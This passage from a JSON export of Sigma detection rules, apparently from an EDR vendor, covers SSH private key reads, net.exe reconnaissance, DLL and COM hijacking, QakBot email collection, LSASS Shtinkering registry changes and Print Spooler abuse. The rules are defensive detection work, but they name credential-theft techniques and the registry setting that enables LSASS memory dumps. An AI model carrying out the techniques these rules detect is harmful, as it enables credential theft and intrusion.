/usr/local/bundle/bin/bundle exec sidekiq -c config/sidekiq_node.yml*'\n - 'python */pulse_xmpp_agent/agentxmpp.py -d -t relayserver'\n - '/usr/bin/python3 */pulse_xmpp_agent/agentxmpp.py -d -t relayserver'\n - 'sidekiq * [* of * busy]'\n - '/usr/bin/java * -dconfig=/etc/centreon-bi/*config.properties*'\n - '/opt/ds_agent/ds_am*'\n - 'remmina'\n - '*airflow-project/airflow-env/bin/python3 -m gunicorn*'\n - 'airflow worker -- localexecutor: *'\n - '/usr/bin/lsattr -vd /root/.ssh/id_dsa_rsync'\n - '/usr/bin/python3 -sp /usr/bin/borg create *'\n - 'aide --config=/etc/aide/aide.conf --update'\n - '/usr/bin/ruby /usr/bin/puppet agent *'\n - '/bin/sh /bin/ssh-copy-id *'\n - ProcessParentImage:\n - '/usr/bin/rsync'\n - '/usr/libexec/gvfsd'\n - '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessParentCommandLine|contains: '/opt/airflow/bin/celery'\n\n exclusion_aide:\n ProcessImage|endswith: '/bin/aide'\n\n exclusion_tomcat:\n ProcessCommandLine|contains: '/bin/java -Djava.util.logging.config.file='\n ProcessParentCommandLine|startswith:\n - '/bin/sh /opt/tomcat/*/bin/catalina.sh '\n - '/usr/lib/systemd/systemd'\n\n exclusion_container:\n ProcessAncestors|contains:\n - '|/usr/bin/dockerd-current|'\n - '|/usr/bin/containerd|'\n - '|/usr/bin/containerd-shim|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_enovacom:\n ProcessAncestors|startswith: '/usr/enovacom/eai/ext/bin/wrapper-linux-x86-64|'\n\n exclusion_telegraf:\n ProcessImage: '/usr/local/bin/ssh'\n ProcessCurrentDirectory: '/home/telegraf/'\n\n exclusion_cron:\n ProcessAncestors|endswith:\n - '|/usr/sbin/cron|/usr/lib/systemd/systemd'\n - '|/usr/sbin/crond|/usr/lib/systemd/systemd'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e5ceb02d-7761-4857-9490-099154c63e43",
"rule_name": "SSH Private Key Read",
"rule_description": "Detects an attempt to read the content of an SSH private key.\nThe private key is the most important and secretive piece of data used when connecting to a remote host via SSH.\nAn attacker can read the SSH private keys available on a compromised system to connect to other remote hosts and impersonate an existing user or service.\nIt is recommended to analyze the process responsible for reading the SSH private key and to determine if it is legitimate.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2025-11-24",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.004",
"attack.t1552.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e5d1db90-73a9-4014-a85c-e240ee90e52e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605561Z",
"creation_date": "2026-03-23T11:45:34.605564Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605571Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875576(v=ws.11)",
"https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/techniques/T1135/"
],
"name": "t1018_netview_remote_system_discovery.yml",
"content": "title: Remote Systems Discovered via net.exe\nid: e5d1db90-73a9-4014-a85c-e240ee90e52e\ndescription: |\n Detects the execution of net.exe with the \"view\" argument.\n This is commonly used by attackers for remote system reconnaissance when preparing for lateral movement.\n It is recommended to analyze the process tree to find the process responsible for the execution of net.exe and to determine its legitimacy.\nreferences:\n - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875576(v=ws.11)\n - https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/techniques/T1135/\ndate: 2022/11/07\nmodified: 2025/09/10\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - attack.t1135\n - attack.s0039\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net.exe'\n - OriginalFileName: 'net.exe'\n\n selection_command:\n CommandLine|contains: ' view'\n\n exclusion_programfiles:\n GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_connectwise:\n GrandparentImage: '?:\\Windows\\LTSvc\\LTSVC.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Connectwise, LLC'\n\n exclusion_local_link_messaging:\n GrandparentImage|endswith: '\\Local file links Native Messaging API Host\\local-link-messaging-host.exe'\n\n exclusion_carestream:\n GrandparentImage:\n - '?:\\Program Files\\Carestream\\CS Trophy Gestion\\CS Trophy Gestion.Exe'\n - '?:\\Program Files (x86)\\Carestream\\CS Trophy Gestion\\CS Trophy Gestion.Exe'\n\n exclusion_fiducial:\n GrandparentImage:\n - '?:\\Program Files\\FIDUCIAL Informatique\\FIDUCIAL Update\\Fiducial.Update.Client.Service.exe'\n - '?:\\Program Files (x86)\\FIDUCIAL Informatique\\FIDUCIAL Update\\Fiducial.Update.Client.Service.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e5d1db90-73a9-4014-a85c-e240ee90e52e",
"rule_name": "Remote Systems Discovered via net.exe",
"rule_description": "Detects the execution of net.exe with the \"view\" argument.\nThis is commonly used by attackers for remote system reconnaissance when preparing for lateral movement.\nIt is recommended to analyze the process tree to find the process responsible for the execution of net.exe and to determine its legitimacy.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2025-09-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1135"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e5ef77ff-fe89-4189-86fd-f1fcbc53d81f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594325Z",
"creation_date": "2026-03-23T11:45:34.594329Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594336Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_packageinspector.yml",
"content": "title: DLL Hijacking via packageinspector.exe\nid: e5ef77ff-fe89-4189-86fd-f1fcbc53d81f\ndescription: |\n Detects potential Windows DLL Hijacking via packageinspector.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'packageinspector.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\msi.dll'\n - '\\SLC.dll'\n - '\\sppc.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e5ef77ff-fe89-4189-86fd-f1fcbc53d81f",
"rule_name": "DLL Hijacking via packageinspector.exe",
"rule_description": "Detects potential Windows DLL Hijacking via packageinspector.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e601af53-adea-47b0-a55f-e3ecbff5cd88",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086247Z",
"creation_date": "2026-03-23T11:45:34.086248Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086253Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/",
"https://www.kroll.com/en/insights/publications/cyber/qakbot-malware-exfiltrating-emails-thread-hijacking-attacks",
"https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/",
"https://attack.mitre.org/techniques/T1114/001/"
],
"name": "t1114_001_quakbot_email_collection.yml",
"content": "title: QakBot Malware Email Collection Detected\nid: e601af53-adea-47b0-a55f-e3ecbff5cd88\ndescription: |\n Detects when QakBot malware creates a directory structure and log file indicative of email collection activities.\n QakBot uses this method to store stolen emails, creating an \"EmailStorage\" directory and a \"collector_log.txt\" file.\n It is recommended to investigate the contest around the creation of the \"EmailStorage\" directory and the associated log file and to check for the presence of other QakBot-related artifacts, such as scheduled tasks or registry entries.\nreferences:\n - https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/\n - https://www.kroll.com/en/insights/publications/cyber/qakbot-malware-exfiltrating-emails-thread-hijacking-attacks\n - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/\n - https://attack.mitre.org/techniques/T1114/001/\ndate: 2022/04/22\nmodified: 2025/03/18\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1114.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Malware.Qakbot\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path:\n - '?:\\Users\\\\*\\EmailStorage_*_??????????\\collector_log.txt'\n - '?:\\Windows\\system32\\config\\systemprofile\\EmailStorage_*_??????????\\collector_log.txt'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e601af53-adea-47b0-a55f-e3ecbff5cd88",
"rule_name": "QakBot Malware Email Collection Detected",
"rule_description": "Detects when QakBot malware creates a directory structure and log file indicative of email collection activities.\nQakBot uses this method to store stolen emails, creating an \"EmailStorage\" directory and a \"collector_log.txt\" file.\nIt is recommended to investigate the contest around the creation of the \"EmailStorage\" directory and the associated log file and to check for the presence of other QakBot-related artifacts, such as scheduled tasks or registry entries.\n",
"rule_creation_date": "2022-04-22",
"rule_modified_date": "2025-03-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1114.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e61629a5-eafd-4156-b60c-a7a61f7f1c70",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623000Z",
"creation_date": "2026-03-23T11:45:34.623002Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623007Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/deepinstinct/Lsass-Shtinkering",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_registry_modification_lsass_shtinkering_global.yml",
"content": "title: Registry Modification Associated with LSASS Shtinkering\nid: e61629a5-eafd-4156-b60c-a7a61f7f1c70\ndescription: |\n Detects a modification in the registry necessary for the LSASS Shtinkering dump method to work.\n LSASS Shtinkering is a LSASS dump technique that consists in sending a message to the Windows Error Reporting service to report an LSASS exception.\n This, along with the correct dump type set in the registry, will dump the LSASS process memory.\n This registry option might be enabled to aid Windows application developers with debugging.\n It is recommended to investigate the process performing the registry modification to determine its legitimacy, a legitimate context could be the debugging of an application.\nreferences:\n - https://github.com/deepinstinct/Lsass-Shtinkering\n - https://attack.mitre.org/techniques/T1112/\ndate: 2023/04/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType'\n Details: 'DWORD (0x00000002)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_regedit:\n ProcessImage: '?:\\Windows\\regedit.exe'\n\n exclusion_schedule:\n - ProcessParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessGrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_amazon:\n ProcessCommandLine: 'powershell.exe -ExecutionPolicy RemoteSigned -file ?:\\Program Files\\Amazon\\Photon\\Bootstrap\\bootstrap.ps1'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e61629a5-eafd-4156-b60c-a7a61f7f1c70",
"rule_name": "Registry Modification Associated with LSASS Shtinkering",
"rule_description": "Detects a modification in the registry necessary for the LSASS Shtinkering dump method to work.\nLSASS Shtinkering is a LSASS dump technique that consists in sending a message to the Windows Error Reporting service to report an LSASS exception.\nThis, along with the correct dump type set in the registry, will dump the LSASS process memory.\nThis registry option might be enabled to aid Windows application developers with debugging.\nIt is recommended to investigate the process performing the registry modification to determine its legitimacy, a legitimate context could be the debugging of an application.\n",
"rule_creation_date": "2023-04-03",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e61f095a-874d-4e1b-8427-c3051e7e0f9b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626893Z",
"creation_date": "2026-03-23T11:45:34.626896Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626900Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1546/015/"
],
"name": "t1546_015_com_hijacking_dll_redirection.yml",
"content": "title: COM Hijacking via DLL Redirection\nid: e61f095a-874d-4e1b-8427-c3051e7e0f9b\ndescription: |\n Detects COM hijacking when a COM object is modified in the registry to point to a DLL in a suspicious location.\n COM hijacking by DLL redirection is a technique where an attacker modifies a legitimate COM component's configuration to make it point to a malicious DLL so the host process unknowingly loads attacker code.\n When the COM object is instantiated, the replaced DLL runs in the context of the trusted process, enabling code execution, persistence, or privilege escalation without modifying the process binary.\n It is recommended to check the process which set the registry key for suspicious activities.\nreferences:\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2025/10/23\nmodified: 2026/02/03\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1546.015\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains: '\\Classes\\CLSID\\{????????-????-????-????-????????????}\\'\n AgentVersion|gte|version: 5.0 # Previous registry info\n PreviousDetails|contains:\n - '\\System32\\'\n - '\\SysWOW64\\'\n\n filter_legit_directories:\n Details|contains:\n - '\\System32\\'\n - '\\SysWOW64\\'\n\n exclusion_citrix:\n Image: '?:\\Program Files\\Citrix\\Secure Access Client\\nsload.exe'\n ProcessSignature: 'Citrix Systems, Inc.'\n ProcessSigned: 'true'\n\n exclusion_dism:\n Image:\n - '?:\\Windows\\SystemTemp\\\\????????-????-????-????-????????????\\DismHost.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\????????-????-????-????-????????????\\DismHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessSigned: 'true'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e61f095a-874d-4e1b-8427-c3051e7e0f9b",
"rule_name": "COM Hijacking via DLL Redirection",
"rule_description": "Detects COM hijacking when a COM object is modified in the registry to point to a DLL in a suspicious location.\nCOM hijacking by DLL redirection is a technique where an attacker modifies a legitimate COM component's configuration to make it point to a malicious DLL so the host process unknowingly loads attacker code.\nWhen the COM object is instantiated, the replaced DLL runs in the context of the trusted process, enabling code execution, persistence, or privilege escalation without modifying the process binary.\nIt is recommended to check the process which set the registry key for suspicious activities.\n",
"rule_creation_date": "2025-10-23",
"rule_modified_date": "2026-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.015"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e62cf952-25f7-4ad2-b66c-70d6cdb5371d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606086Z",
"creation_date": "2026-03-23T11:45:34.606090Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606097Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_suspicious_spoolsv_child_process.yml",
"content": "title: Suspicious Process Spawned by spoolsv.exe\nid: e62cf952-25f7-4ad2-b66c-70d6cdb5371d\ndescription: |\n Detects the execution of a suspicious process by the Windows Print Spooler binary.\n This can be the result of the exploitation of the CVE-2022-38028 vulnerability that allows attackers to escalate as SYSTEM.\n It is recommended to investigate the process spawned by spoolsv.exe and other suspicious activities on the machine before this action.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2024/04/23\nmodified: 2025/10/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\spoolsv.exe'\n\n exclusion_image:\n Image:\n - '?:\\Windows\\System32\\spoolsv.exe'\n - '?:\\Windows\\System32\\conhost.exe'\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\System32\\route.exe'\n - '?:\\Windows\\splwow64.exe'\n - '?:\\Windows\\System32\\cacls.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\System32\\wermgr.exe'\n - '?:\\Program Files\\\\*'\n - '?:\\Program Files (x86)\\\\*'\n - '?:\\Windows\\System32\\spool\\drivers\\x64\\3\\\\*'\n - '?:\\Windows\\System32\\spool\\drivers\\w32x86\\3\\\\*'\n - '*\\gs\\gs*\\bin\\gswin64c.exe'\n - '*\\gs\\gs*\\bin\\gswin32c.exe'\n - '?:\\CSPrinter\\Leica\\Application\\CSPrtHelp.exe'\n - '?:\\Windows\\System32\\th-2500sm.exe' # Thomson Status Monitor\n - '?:\\Windows\\System32\\pt2500sm.exe' # Zhuhai Pantum Electronics Co.,Ltd.\n - '?:\\Users\\\\*\\AppData\\Local\\GravoTechLaser\\bidiEthernet_GravoTech Laser.exe'\n - '?:\\Windows\\System32\\NPI_IGDoc.EXE'\n\n exclusion_wscript.exe:\n CommandLine:\n - '?:\\Windows\\system32\\wscript.exe /B /E:VBS ?:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\ACFPDF.TXT *'\n - '?:\\Windows\\SysWOW64\\wscript.exe /B /E:VBS ?:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\ACFPDF.TXT *'\n\n exclusion_regsvr32:\n CommandLine:\n - '?:\\WINDOWS\\SysWOW64\\regsvr32.exe /s ?:\\WINDOWS\\SysWOW64\\PrintConfig.dll'\n - '?:\\WINDOWS\\system32\\regsvr32.exe /s ?:\\WINDOWS\\system32\\spool\\drivers\\\\*\\3\\PrintConfig.dll'\n - 'regsvr32.exe /s /c DriverAutomationLibrary.dll'\n - '*regsvr32* ?:\\WINDOWS\\system32\\\\*'\n - '?:\\Windows\\System32\\regsvr32.exe /s ?:\\WINDOWS\\SYSTEM32\\\\*'\n\n exclusion_rundll32:\n CommandLine:\n - 'rundll32.exe ?:\\Windows\\system32\\spool\\DRIVERS\\\\*\\3\\\\*.dll,StatusMonitorEntryPoint *'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\\\*\\3\\\\*.dll,VendorSetupEntryPoint *Canon*'\n - 'rundll32.exe ?:\\Windows\\system32\\spool\\DRIVERS\\\\*\\3\\\\*.dll,CnmDxPEntryPoint *Canon*'\n - 'RUNDLL32 PRINTUI.DLL,PrintUIEntry /Xs /n *'\n - 'rundll32.exe url.dll,FileProtocolHandler EWB:undefined:0000:PRINTTO:*'\n - 'rundll32.exe ?:\\WINDOWS\\SYSTEM32\\SPOOL\\DRIVERS\\\\*\\3\\ES4PCCFG.DLL,DseMonitorJobA *'\n - 'rundll32.exe ?:\\Program Files\\TechSmith\\SnagIt *\\\\*'\n - 'rundll32.exe ?:\\Program Files (x86)\\TechSmith\\SnagIt *\\\\*'\n\n exclusion_cmd:\n CommandLine:\n - '?:\\Windows\\system32\\cmd.exe /c *\\pdfconverter\\\\*'\n - '?:\\windows\\system32\\cmd.exe /c pnputil *'\n - '?:\\windows\\system32\\cmd.exe /c pnputil.exe /enum-devices'\n - '?:\\windows\\system32\\cmd.exe /c pnputil.exe /enum-devices *'\n - '?:\\Windows\\system32\\cmd.exe /c *\\pstopdf.cmd'\n # Canon (CNMCPA9.DLL, CNMN6PPM.DLL, ...)\n # bbb97189a4de7ea08f128e0b8c481a89c50e993d8462cf737d28a148fece505f\n - '?:\\Windows\\system32\\cmd.exe /c route ADD -p 169.254.0.0 MASK 255.255.0.0 *'\n - '?:\\Windows\\System32\\cmd.exe /c netsh interface set interface XPS Card Printer High Speed USB Connection *'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Program Files\\\\*\\\\*.bat'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Program Files (x86)\\\\*\\\\*.bat'\n\n 